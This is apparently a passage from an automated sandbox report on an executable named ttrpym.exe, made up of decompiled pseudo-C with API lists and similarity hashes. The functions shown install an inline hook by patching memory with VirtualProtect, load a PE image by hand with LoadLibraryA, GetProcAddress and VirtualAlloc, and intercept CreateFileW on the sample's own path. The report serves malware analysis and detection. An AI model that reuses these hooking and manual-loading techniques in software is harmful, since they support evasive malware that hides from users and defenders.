                                                                                                                        						_push(0);
                                                                                                                        						_push(_t62);
                                                                                                                        						_t38 = E00402F3C(_t68, _t76, _t85, _t87, _t109);
                                                                                                                        						_t85 = _t85 + _t38;
                                                                                                                        						_t62 = _t62 + _t38;
                                                                                                                        					} while (_t85 < 5);
                                                                                                                        					if( *(_t97 + 0x14) != 0) {
                                                                                                                        						 *(_t97 + 0x20) = 5;
                                                                                                                        						_t63 =  *(_t97 + 0x20);
                                                                                                                        					} else {
                                                                                                                        						_t11 = _t85 + 5; // 0x5
                                                                                                                        						_t63 = _t11;
                                                                                                                        						 *(_t97 + 0x20) = _t63;
                                                                                                                        					}
                                                                                                                        					_t39 = E0040DFE9(_t63, _t76, _t85, _t63);
                                                                                                                        					_t98 = _t97 + 4;
                                                                                                                        					 *( *(_t97 + 0x2c)) = _t39;
                                                                                                                        					if(_t39 != 0) {
                                                                                                                        						VirtualProtect(_t39, _t63, 0x40, _t98 + 0x10); // executed
                                                                                                                        						E0040E430(_t85,  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x28)))), 0x90,  *((intOrPtr*)(_t98 + 0x20)));
                                                                                                                        						_t99 = _t98 + 0xc;
                                                                                                                        						__eflags =  *((intOrPtr*)(_t99 + 0x14));
                                                                                                                        						_push(_t85);
                                                                                                                        						_push(_t87);
                                                                                                                        						if( *((intOrPtr*)(_t99 + 0x14)) != 0) {
                                                                                                                        							_t86 =  *((intOrPtr*)(_t99 + 0x30));
                                                                                                                        							_push( *_t86);
                                                                                                                        							E0040E0C0(VirtualProtect, _t86, _t87);
                                                                                                                        							_t44 =  *_t86;
                                                                                                                        							_t100 = _t99 + 0xc;
                                                                                                                        							_t90 = _t89 - _t44;
                                                                                                                        							__eflags = _t90;
                                                                                                                        							 *((intOrPtr*)(_t44 + 1)) =  *((intOrPtr*)(_t99 + 0x24)) + _t90 - 5;
                                                                                                                        							VirtualProtect(_t87, 5, 0x40, _t100 + 0x10);
                                                                                                                        							 *_t87 = 0x90909090;
                                                                                                                        							 *((char*)(_t87 + 4)) = 0x90909090;
                                                                                                                        							E00401230( *((intOrPtr*)(_t100 + 0x24)), _t87);
                                                                                                                        							VirtualProtect(_t87, 5,  *(_t100 + 0x18), _t100 + 0x18);
                                                                                                                        							return 1;
                                                                                                                        						} else {
                                                                                                                        							_t92 =  *((intOrPtr*)(_t99 + 0x30));
                                                                                                                        							_push( *_t92);
                                                                                                                        							E0040E0C0(VirtualProtect, _t85, _t87);
                                                                                                                        							__eflags =  *_t92 + _t85;
                                                                                                                        							E00401230(_t87 + 5,  *_t92 + _t85);
                                                                                                                        							_t103 = _t99 + 0x14;
                                                                                                                        							_t23 = _t85 + 5; // 0x5
                                                                                                                        							_t93 = _t23;
                                                                                                                        							VirtualProtect(_t87, _t93, 0x40, _t103 + 0x10); // executed
                                                                                                                        							E0040E430(_t85, _t87, 0x90, _t85);
                                                                                                                        							E00401230( *((intOrPtr*)(_t103 + 0x30)), _t87);
                                                                                                                        							VirtualProtect(_t87, _t93,  *(_t103 + 0x24), _t103 + 0x24); // executed
                                                                                                                        							return 1;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						return _t39;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}



























                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 004012F1
                                                                                                                        • VirtualProtect.KERNEL32(00000000,00000005,00000040,?,00000000,GetModuleFileNameW,004011C0,004237C0), ref: 0040131A
                                                                                                                        • _memset.LIBCMT ref: 0040132D
                                                                                                                        • VirtualProtect.KERNEL32(?,00000005,00000040,?), ref: 0040136C
                                                                                                                        • _memset.LIBCMT ref: 00401375
                                                                                                                        • VirtualProtect.KERNEL32(?,00000005,?,?), ref: 00401394
                                                                                                                        • VirtualProtect.KERNEL32(?,00000005,00000040,?), ref: 004013CB
                                                                                                                        • VirtualProtect.KERNEL32(?,00000005,?,?), ref: 004013F2
                                                                                                                          • Part of subcall function 00401230: IsBadReadPtr.KERNEL32(?,00000001,?,?,76D26760,004013E2,?,?), ref: 00401240
                                                                                                                          • Part of subcall function 00401230: IsBadReadPtr.KERNEL32(?,00000004), ref: 0040124F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual$Read_memset$_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 169404485-0
                                                                                                                        • Opcode ID: 9654bc4f30739082c352b25aa023c39127d2627010b80ac06443884e484b5978
                                                                                                                        • Instruction ID: fb0cdb721b6fef07ebaa0484e151029a02cf396943db553e897e3e475b54f777
                                                                                                                        • Opcode Fuzzy Hash: 9654bc4f30739082c352b25aa023c39127d2627010b80ac06443884e484b5978
                                                                                                                        • Instruction Fuzzy Hash: 6A419271505301ABD310DF59DC81E6BB7E8FFC4708F04492EF584A7291E779EA098BAA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 96%
                                                                                                                        			E004053C0() {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				intOrPtr* _t28;
                                                                                                                        				intOrPtr _t32;
                                                                                                                        				struct HINSTANCE__* _t35;
                                                                                                                        				intOrPtr _t38;
                                                                                                                        				void _t39;
                                                                                                                        				signed int _t40;
                                                                                                                        				void* _t42;
                                                                                                                        				CHAR* _t44;
                                                                                                                        				_Unknown_base(*)()* _t45;
                                                                                                                        				struct HINSTANCE__* _t47;
                                                                                                                        				void* _t52;
                                                                                                                        				signed int* _t53;
                                                                                                                        				void* _t56;
                                                                                                                        				signed int* _t60;
                                                                                                                        				intOrPtr _t62;
                                                                                                                        				void* _t63;
                                                                                                                        				signed int _t70;
                                                                                                                        
                                                                                                                        				_t52 =  *(_t63 + 0x14);
                                                                                                                        				_t2 = _t52 + 4; // 0xffff5085
                                                                                                                        				_t62 =  *_t2;
                                                                                                                        				_t28 =  *_t52 - 0xffffff80;
                                                                                                                        				if( *((intOrPtr*)(_t28 + 4)) <= 0) {
                                                                                                                        					return 1;
                                                                                                                        				} else {
                                                                                                                        					_t56 =  *_t28 + _t62;
                                                                                                                        					 *(_t63 + 0x18) = _t56;
                                                                                                                        					if(IsBadReadPtr(_t56, 0x14) != 0) {
                                                                                                                        						return 1;
                                                                                                                        					} else {
                                                                                                                        						while(1) {
                                                                                                                        							_t32 =  *((intOrPtr*)(_t56 + 0xc));
                                                                                                                        							if(_t32 == 0) {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							_t35 = LoadLibraryA(_t32 + _t62); // executed
                                                                                                                        							_t47 = _t35;
                                                                                                                        							_t67 = _t47 - 0xffffffff;
                                                                                                                        							if(_t47 == 0xffffffff) {
                                                                                                                        								L17:
                                                                                                                        								__eflags = 0;
                                                                                                                        								return 0;
                                                                                                                        							} else {
                                                                                                                        								_t6 = _t52 + 0xc; // 0x52ffffff
                                                                                                                        								_t7 = _t52 + 8; // 0x48958bff
                                                                                                                        								_push(4 +  *_t6 * 4);
                                                                                                                        								_push( *_t7);
                                                                                                                        								_t38 = E0040EB37(_t47,  *_t7, _t52, _t56, _t67);
                                                                                                                        								_t63 = _t63 + 8;
                                                                                                                        								 *((intOrPtr*)(_t52 + 8)) = _t38;
                                                                                                                        								if(_t38 == 0) {
                                                                                                                        									goto L17;
                                                                                                                        								} else {
                                                                                                                        									_t11 = _t52 + 0xc; // 0x52ffffff
                                                                                                                        									 *(_t38 +  *_t11 * 4) = _t47;
                                                                                                                        									 *(_t52 + 0xc) =  *(_t52 + 0xc) + 1;
                                                                                                                        									_t39 =  *_t56;
                                                                                                                        									if(_t39 == 0) {
                                                                                                                        										_t53 =  *((intOrPtr*)(_t56 + 0x10)) + _t62;
                                                                                                                        										_t60 = _t53;
                                                                                                                        									} else {
                                                                                                                        										_t53 = _t39 + _t62;
                                                                                                                        										_t60 =  *((intOrPtr*)(_t56 + 0x10)) + _t62;
                                                                                                                        									}
                                                                                                                        									_t40 =  *_t53;
                                                                                                                        									_t70 = _t40;
                                                                                                                        									if(_t70 == 0) {
                                                                                                                        										L15:
                                                                                                                        										_t42 =  *(_t63 + 0x10) + 0x14;
                                                                                                                        										 *(_t63 + 0x18) = _t42;
                                                                                                                        										if(IsBadReadPtr(_t42, 0x14) != 0) {
                                                                                                                        											break;
                                                                                                                        										} else {
                                                                                                                        											_t52 =  *(_t63 + 0x18);
                                                                                                                        											_t56 =  *(_t63 + 0x10);
                                                                                                                        											continue;
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										L10:
                                                                                                                        										L10:
                                                                                                                        										if(_t70 >= 0) {
                                                                                                                        											_t44 = _t40 + _t62 + 2;
                                                                                                                        										} else {
                                                                                                                        											_t44 = _t40 & 0x0000ffff;
                                                                                                                        										}
                                                                                                                        										_t45 = GetProcAddress(_t47, _t44);
                                                                                                                        										 *_t60 = _t45;
                                                                                                                        										if(_t45 == 0) {
                                                                                                                        											goto L17;
                                                                                                                        										}
                                                                                                                        										_t40 = _t53[1];
                                                                                                                        										_t53 =  &(_t53[1]);
                                                                                                                        										_t60 =  &(_t60[1]);
                                                                                                                        										if(_t40 != 0) {
                                                                                                                        											goto L10;
                                                                                                                        										} else {
                                                                                                                        											goto L15;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							goto L21;
                                                                                                                        						}
                                                                                                                        						return 1;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L21:
                                                                                                                        			}

























                                                                                                                        APIs
                                                                                                                        • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,89FFFFFF,00401DAE,00000000,?,00405636,00000000,?,?,?,?,00401DAE,?), ref: 004053EB
                                                                                                                        • LoadLibraryA.KERNEL32(?,?,00405636,00000000,?,?,?,?,00401DAE,?), ref: 0040540E
                                                                                                                        • _realloc.LIBCMT ref: 0040542E
                                                                                                                          • Part of subcall function 0040EB37: _malloc.LIBCMT ref: 0040EB4D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405473
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00405636,00000000,?,?,?,?,00401DAE,?), ref: 0040549A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Read$AddressLibraryLoadProc_malloc_realloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3858321205-0
                                                                                                                        • Opcode ID: ba75fad5814da8645300297398679ffc7915939886460a30281cd22e6299f0ab
                                                                                                                        • Instruction ID: d5ea892b97493d099cb7b2a7e0e9e3205861eb97d20455837cb6fc0762b2b167
                                                                                                                        • Opcode Fuzzy Hash: ba75fad5814da8645300297398679ffc7915939886460a30281cd22e6299f0ab
                                                                                                                        • Instruction Fuzzy Hash: 2D31DE726007168FD7208F29DC80BA7B7A4FF44326F15463AE915E7381E739E854CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 66%
                                                                                                                        			E00402D90(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __ebp;
                                                                                                                        				signed int _t12;
                                                                                                                        				void* _t21;
                                                                                                                        				int _t25;
                                                                                                                        				void* _t30;
                                                                                                                        				int _t32;
                                                                                                                        				char* _t35;
                                                                                                                        
                                                                                                                        				_t21 = __edx;
                                                                                                                        				_t35 = _a4;
                                                                                                                        				_t17 = __ecx;
                                                                                                                        				if(_t35 != 0) {
                                                                                                                        					_t25 = lstrlenA(_t35) + 1;
                                                                                                                        					E00402C50(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                                                                        					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                                                                                        					asm("sbb esi, esi");
                                                                                                                        					_t30 =  ~_t12 + 1;
                                                                                                                        					if(_t30 != 0) {
                                                                                                                        						_t12 = GetLastError();
                                                                                                                        						if(_t12 == 0x7a) {
                                                                                                                        							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                                                                        							E00402C50(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                                                                        							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                                                                        							asm("sbb esi, esi");
                                                                                                                        							_t30 =  ~_t12 + 1;
                                                                                                                        						}
                                                                                                                        						if(_t30 != 0) {
                                                                                                                        							_t12 = E00401030();
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					return _t12;
                                                                                                                        				} else {
                                                                                                                        					 *__ecx = _t35;
                                                                                                                        					return __eax;
                                                                                                                        				}
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,00402F16,!@,00000003,?,0040210D,?), ref: 00402DA6
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001,00000003,?,0040210D,?), ref: 00402DCF
                                                                                                                        • GetLastError.KERNEL32(?,0040210D,?), ref: 00402DE0
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000,?,0040210D,?), ref: 00402DF8
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000,?,?,?,?,?,?,0040210D,?), ref: 00402E20
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3322701435-0
                                                                                                                        • Opcode ID: 2aa08fb6b6da8d238293cb9aff5cf094fc9b027109ce00417c36bcc6a805862d
                                                                                                                        • Instruction ID: e849e6f5357eddbb594fdc98ee0711563944c1755324f5bc9fe43ff7a850603f
                                                                                                                        • Opcode Fuzzy Hash: 2aa08fb6b6da8d238293cb9aff5cf094fc9b027109ce00417c36bcc6a805862d
                                                                                                                        • Instruction Fuzzy Hash: FB118E71540224BBD230AA25CC8CF677F6CDB86BA5F008569FA55AA2C1C775E904C6F8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 95%
                                                                                                                        			E0040E9C8(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                        				signed int _v0;
                                                                                                                        				char _v16;
                                                                                                                        				void* _t13;
                                                                                                                        				signed int _t14;
                                                                                                                        				signed int _t18;
                                                                                                                        				signed int _t20;
                                                                                                                        				void* _t21;
                                                                                                                        				void* _t22;
                                                                                                                        				signed int _t23;
                                                                                                                        				signed int _t25;
                                                                                                                        				void* _t28;
                                                                                                                        				void* _t36;
                                                                                                                        				void* _t37;
                                                                                                                        				void* _t39;
                                                                                                                        				signed int _t41;
                                                                                                                        				void* _t45;
                                                                                                                        
                                                                                                                        				_t37 = __edi;
                                                                                                                        				_t36 = __edx;
                                                                                                                        				_t28 = __ebx;
                                                                                                                        				while(1) {
                                                                                                                        					_t13 = E0040DFE9(_t28, _t36, _t37, _a4); // executed
                                                                                                                        					if(_t13 != 0) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_t14 = E004114B7(_a4);
                                                                                                                        					__eflags = _t14;
                                                                                                                        					if(_t14 == 0) {
                                                                                                                        						__eflags =  *0x4237e0 & 0x00000001;
                                                                                                                        						if(( *0x4237e0 & 0x00000001) == 0) {
                                                                                                                        							 *0x4237e0 =  *0x4237e0 | 0x00000001;
                                                                                                                        							__eflags =  *0x4237e0;
                                                                                                                        							E0040E95E(0x4237d4);
                                                                                                                        							E00411CF1( *0x4237e0, 0x41a66b);
                                                                                                                        						}
                                                                                                                        						E0040E9AB( &_v16, 0x4237d4);
                                                                                                                        						E00411D08( &_v16, 0x420f1c);
                                                                                                                        						asm("int3");
                                                                                                                        						__eflags =  *0x4253c8;
                                                                                                                        						_push(0x4237d4);
                                                                                                                        						_t41 =  *0x423960; // 0x12f1860
                                                                                                                        						if( *0x4253c8 != 0) {
                                                                                                                        							_push(_t37);
                                                                                                                        							__eflags = _t41;
                                                                                                                        							if(_t41 != 0) {
                                                                                                                        								L13:
                                                                                                                        								__eflags = _v0;
                                                                                                                        								if(_v0 != 0) {
                                                                                                                        									_t39 = E00411EF0(_v0);
                                                                                                                        									while(1) {
                                                                                                                        										_t20 =  *_t41;
                                                                                                                        										__eflags = _t20;
                                                                                                                        										if(_t20 == 0) {
                                                                                                                        											goto L20;
                                                                                                                        										}
                                                                                                                        										_t21 = E00411EF0(_t20);
                                                                                                                        										__eflags = _t21 - _t39;
                                                                                                                        										if(_t21 <= _t39) {
                                                                                                                        											L18:
                                                                                                                        											_t41 = _t41 + 4;
                                                                                                                        											__eflags = _t41;
                                                                                                                        											continue;
                                                                                                                        										} else {
                                                                                                                        											_t22 =  *_t41;
                                                                                                                        											__eflags =  *((char*)(_t22 + _t39)) - 0x3d;
                                                                                                                        											if( *((char*)(_t22 + _t39)) != 0x3d) {
                                                                                                                        												goto L18;
                                                                                                                        											} else {
                                                                                                                        												_t23 = E00411EC9(_t22, _v0, _t39);
                                                                                                                        												_t45 = _t45 + 0xc;
                                                                                                                        												__eflags = _t23;
                                                                                                                        												if(_t23 == 0) {
                                                                                                                        													_t18 =  *_t41 + _t39 + 1;
                                                                                                                        												} else {
                                                                                                                        													goto L18;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										goto L21;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								goto L20;
                                                                                                                        							} else {
                                                                                                                        								__eflags =  *0x423968 - _t41; // 0x0
                                                                                                                        								if(__eflags == 0) {
                                                                                                                        									L20:
                                                                                                                        									_t18 = 0;
                                                                                                                        									__eflags = 0;
                                                                                                                        								} else {
                                                                                                                        									_t25 = E00411F7B(_t36);
                                                                                                                        									__eflags = _t25;
                                                                                                                        									if(_t25 != 0) {
                                                                                                                        										goto L20;
                                                                                                                        									} else {
                                                                                                                        										_t41 =  *0x423960; // 0x12f1860
                                                                                                                        										__eflags = _t41;
                                                                                                                        										if(_t41 == 0) {
                                                                                                                        											goto L20;
                                                                                                                        										} else {
                                                                                                                        											goto L13;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							L21:
                                                                                                                        						} else {
                                                                                                                        							_t18 = 0;
                                                                                                                        						}
                                                                                                                        						return _t18;
                                                                                                                        					} else {
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					L24:
                                                                                                                        				}
                                                                                                                        				return _t13;
                                                                                                                        				goto L24;
                                                                                                                        			}



















                                                                                                                        0x0040ea5c
                                                                                                                        0x0040ea5c
                                                                                                                        0x0040ea62
                                                                                                                        0x0040ea64
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040ea64
                                                                                                                        0x0040ea5a
                                                                                                                        0x0040ea51
                                                                                                                        0x0040eaa8
                                                                                                                        0x0040ea42
                                                                                                                        0x0040ea42
                                                                                                                        0x0040ea42
                                                                                                                        0x0040eaab
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040e9dd
                                                                                                                        0x0040e9ed
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 0040E9E2
                                                                                                                          • Part of subcall function 0040DFE9: __FF_MSGBANNER.LIBCMT ref: 0040E00C
                                                                                                                          • Part of subcall function 0040DFE9: __NMSG_WRITE.LIBCMT ref: 0040E013
                                                                                                                          • Part of subcall function 0040DFE9: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00414D74,00000001,00000001,00000001,?,004101FE,00000018,00421158,0000000C,0041028F), ref: 0040E060
                                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040EA05
                                                                                                                          • Part of subcall function 0040E95E: std::exception::exception.LIBCMT ref: 0040E96A
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040EA19
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EA27
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1411284514-0
                                                                                                                        • Opcode ID: a5f85bbceda087547e4e1f4cb1a01cc270276f4e05f1b5642957b39d270b0259
                                                                                                                        • Instruction ID: fe163c5bcfbbff610385fb7c2169ce8031ee546abf50f098d9841e9ad0292232
                                                                                                                        • Opcode Fuzzy Hash: a5f85bbceda087547e4e1f4cb1a01cc270276f4e05f1b5642957b39d270b0259
                                                                                                                        • Instruction Fuzzy Hash: 4BF0E2B1B0010966CF04B763FC0398A7B649F80758B14883BBD01B11E2DF7EDA62868D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004051E0() {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				intOrPtr* _t16;
                                                                                                                        				intOrPtr _t17;
                                                                                                                        				long _t18;
                                                                                                                        				void* _t19;
                                                                                                                        				intOrPtr* _t21;
                                                                                                                        				long _t23;
                                                                                                                        				void* _t27;
                                                                                                                        				void* _t30;
                                                                                                                        				intOrPtr _t41;
                                                                                                                        				long* _t43;
                                                                                                                        				void* _t45;
                                                                                                                        				void* _t46;
                                                                                                                        
                                                                                                                        				_t16 =  *((intOrPtr*)(_t46 + 0xc));
                                                                                                                        				_t41 =  *((intOrPtr*)(_t16 + 4));
                                                                                                                        				_t17 =  *_t16;
                                                                                                                        				_t45 = 0;
                                                                                                                        				_t30 = ( *(_t17 + 0x14) & 0x0000ffff) + _t17 + 0x18;
                                                                                                                        				if(0 <  *((intOrPtr*)(_t17 + 6))) {
                                                                                                                        					_t27 = VirtualAlloc;
                                                                                                                        					_t43 = _t30 + 0x10;
                                                                                                                        					do {
                                                                                                                        						_t18 =  *_t43;
                                                                                                                        						if(_t18 != 0) {
                                                                                                                        							_t19 = VirtualAlloc( *((intOrPtr*)(_t43 - 4)) + _t41, _t18, 0x1000, 4); // executed
                                                                                                                        							E0040E0C0(_t27, _t41, _t43, _t19, _t43[1] +  *((intOrPtr*)(_t46 + 0x14)),  *_t43);
                                                                                                                        							L6:
                                                                                                                        							_t46 = _t46 + 0xc;
                                                                                                                        							goto L7;
                                                                                                                        						}
                                                                                                                        						_t23 =  *( *((intOrPtr*)(_t46 + 0x18)) + 0x38);
                                                                                                                        						if(_t23 <= 0) {
                                                                                                                        							goto L7;
                                                                                                                        						}
                                                                                                                        						E0040E430(_t41, VirtualAlloc( *((intOrPtr*)(_t43 - 4)) + _t41, _t23, 0x1000, 4), 0, _t23);
                                                                                                                        						goto L6;
                                                                                                                        						L7:
                                                                                                                        						_t21 =  *((intOrPtr*)(_t46 + 0x1c));
                                                                                                                        						_t45 = _t45 + 1;
                                                                                                                        						_t43 =  &(_t43[0xa]);
                                                                                                                        					} while (_t45 < ( *( *_t21 + 6) & 0x0000ffff));
                                                                                                                        					return _t21;
                                                                                                                        				}
                                                                                                                        				return _t17;
                                                                                                                        			}



















                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(?,000000D9,00001000,00000004,00000000,000000D9,00000000,00000000,89FFFFFF,00401DAE,0040561B,00401DAE,89FFFFFF,00000000,00000000,00401DAE), ref: 0040522A
                                                                                                                        • _memset.LIBCMT ref: 0040522D
                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,00000000,89FFFFFF,00401DAE,0040561B,00401DAE,89FFFFFF,00000000,00000000,00401DAE,?), ref: 00405242
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual$_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1876456587-0
                                                                                                                        • Opcode ID: 196c75b8a8e267e4806b6442ffe4bc439e6027dbbe9d05606222a8196ddbe102
                                                                                                                        • Instruction ID: 5abe8866e73eec10d11d9c15e299d5044fe40b74fc020eff72ed462cb95803b4
                                                                                                                        • Opcode Fuzzy Hash: 196c75b8a8e267e4806b6442ffe4bc439e6027dbbe9d05606222a8196ddbe102
                                                                                                                        • Instruction Fuzzy Hash: 2B115EB5240200AFD324DF96DC84F67B3E9EFC8714B14885DF645AB291D675EC41CB64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 87%
                                                                                                                        			E004010D0(WCHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28) {
                                                                                                                        				WCHAR* _t11;
                                                                                                                        				void* _t14;
                                                                                                                        				WCHAR* _t15;
                                                                                                                        				char* _t16;
                                                                                                                        				short _t19;
                                                                                                                        				short _t22;
                                                                                                                        				WCHAR* _t23;
                                                                                                                        
                                                                                                                        				_t23 = _a4;
                                                                                                                        				_t16 = L"C:\\Users\\frontdesk\\Desktop\\ttrpym.exe";
                                                                                                                        				_t11 = _t23;
                                                                                                                        				while(1) {
                                                                                                                        					_t19 =  *_t11;
                                                                                                                        					if(_t19 !=  *_t16) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					if(_t19 == 0) {
                                                                                                                        						L5:
                                                                                                                        						_t11 = 0;
                                                                                                                        					} else {
                                                                                                                        						_t22 = _t11[1];
                                                                                                                        						if(_t22 != _t16[2]) {
                                                                                                                        							break;
                                                                                                                        						} else {
                                                                                                                        							_t11 =  &(_t11[2]);
                                                                                                                        							_t16 =  &(_t16[4]);
                                                                                                                        							if(_t22 != 0) {
                                                                                                                        								continue;
                                                                                                                        							} else {
                                                                                                                        								goto L5;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L7:
                                                                                                                        					if(_t11 == 0) {
                                                                                                                        						_pop(_t23);
                                                                                                                        						_t15 =  *0x423184; // 0xf3f310
                                                                                                                        						_a4 = _t15;
                                                                                                                        						goto ( *0x4237d0);
                                                                                                                        					}
                                                                                                                        					_t14 = CreateFileW(_t23, _a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                        					return _t14;
                                                                                                                        				}
                                                                                                                        				asm("sbb eax, eax");
                                                                                                                        				asm("sbb eax, 0xffffffff");
                                                                                                                        				goto L7;
                                                                                                                        			}











                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 0040113E
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\Desktop\ttrpym.exe, xrefs: 004010D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID: C:\Users\user\Desktop\ttrpym.exe
                                                                                                                        • API String ID: 823142352-321961137
                                                                                                                        • Opcode ID: 6de5dda7763aa2dd797a2bc5ac410260bca454c832065705ddf1a868c08e6396
                                                                                                                        • Instruction ID: 9c67e40f563f7f14195f56294d9d5260319f5e89579a379ee8b99830979e6a76
                                                                                                                        • Opcode Fuzzy Hash: 6de5dda7763aa2dd797a2bc5ac410260bca454c832065705ddf1a868c08e6396
                                                                                                                        • Instruction Fuzzy Hash: 5501BCB2604212ABD304CF14C8419A7B3F6EBBC350F40892AF985D73A4E335ED42C799
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405270() {
                                                                                                                        				intOrPtr* _t31;
                                                                                                                        				signed int _t32;
                                                                                                                        				signed char _t33;
                                                                                                                        				intOrPtr _t38;
                                                                                                                        				signed int _t43;
                                                                                                                        				void* _t47;
                                                                                                                        				signed int _t48;
                                                                                                                        				signed int _t52;
                                                                                                                        				long _t54;
                                                                                                                        				signed char* _t58;
                                                                                                                        				unsigned int _t62;
                                                                                                                        				long _t63;
                                                                                                                        				void* _t66;
                                                                                                                        				void* _t68;
                                                                                                                        
                                                                                                                        				_t31 =  *((intOrPtr*)(_t68 + 0xc));
                                                                                                                        				_t38 =  *_t31;
                                                                                                                        				 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t31 + 4));
                                                                                                                        				_t66 = 0;
